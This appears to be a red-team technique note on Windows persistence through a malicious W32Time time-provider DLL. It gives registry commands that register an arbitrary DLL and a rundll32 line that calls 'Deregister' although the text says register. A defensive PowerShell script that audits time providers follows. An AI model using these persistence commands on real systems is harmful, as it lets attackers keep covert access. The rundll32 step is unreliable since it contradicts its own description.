Time Provider

Windows uses time providers to synchronize its clock with other machines on the network. Accurate time synchronization matters because many protocols in AD require it.

Note that the DLL needs to be written in a specific way (the W32Time service expects a time-provider interface, not an arbitrary DLL); a template for this was published by Scott Lundgren of Carbon Black:

To use this for persistence, add the following registry values; the W32Time service loads the DLL named there as a time provider:

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_EXPAND_SZ /v "DllName" /d "%systemroot%\system32\exec.dll" /f 
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "InputProvider" /d "1" /f

Or use the gametime DLL and run the register function from it:

rundll32.exe gametime.dll,Deregister
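A defender-side check for this persistence location, written here as an added PowerShell example (it is not part of the original page): it walks the TimeProviders key, expands each DllName, and flags any entry whose DLL is not one of the built-in provider DLLs or does not live in System32, reporting the Authenticode status alongside. The allow-list of DLL names is an assumption that should be tuned for your environment.

```powershell
# Added example, not from the original page: audit W32Time time providers.
# Assumption: on a typical Windows host the built-in providers (NtpClient,
# NtpServer, and VMICTimeProvider on Hyper-V guests) resolve to these DLLs.
$base          = 'HKLM:\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders'
$expectedDlls  = @('w32time.dll', 'vmictimeprovider.dll')
$expectedDir   = (Join-Path $env:SystemRoot 'System32').ToLowerInvariant()

function Get-TimeProviderAudit {
    Get-ChildItem -Path $base | ForEach-Object {
        $props    = Get-ItemProperty -Path $_.PSPath
        $dll      = [string]$props.DllName
        # Expand %systemroot% and friends so we compare the real on-disk path.
        $expanded = [Environment]::ExpandEnvironmentVariables($dll)
        $leaf     = [System.IO.Path]::GetFileName($expanded).ToLowerInvariant()
        $dir      = [System.IO.Path]::GetDirectoryName($expanded)
        $dir      = if ($dir) { $dir.TrimEnd('\').ToLowerInvariant() } else { '' }

        if (Test-Path -LiteralPath $expanded) {
            $sigStatus = (Get-AuthenticodeSignature -FilePath $expanded).Status
        } else {
            $sigStatus = 'file missing'
        }

        # Flag unknown DLL names and DLLs loaded from outside System32.
        $suspicious = (-not ($expectedDlls -contains $leaf)) -or ($dir -ne $expectedDir)

        [pscustomobject]@{
            Provider      = $_.PSChildName
            DllName       = $dll
            Enabled       = $props.Enabled
            InputProvider = $props.InputProvider
            Signature     = $sigStatus
            Suspicious    = $suspicious
        }
    }
}

# Print the full table; the Suspicious column is what an analyst triages.
Get-TimeProviderAudit | Format-Table -AutoSize
```

Run it as an administrator from an elevated PowerShell session; a provider that points to a DLL outside System32, to a missing file, or to an unsigned binary warrants further investigation.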
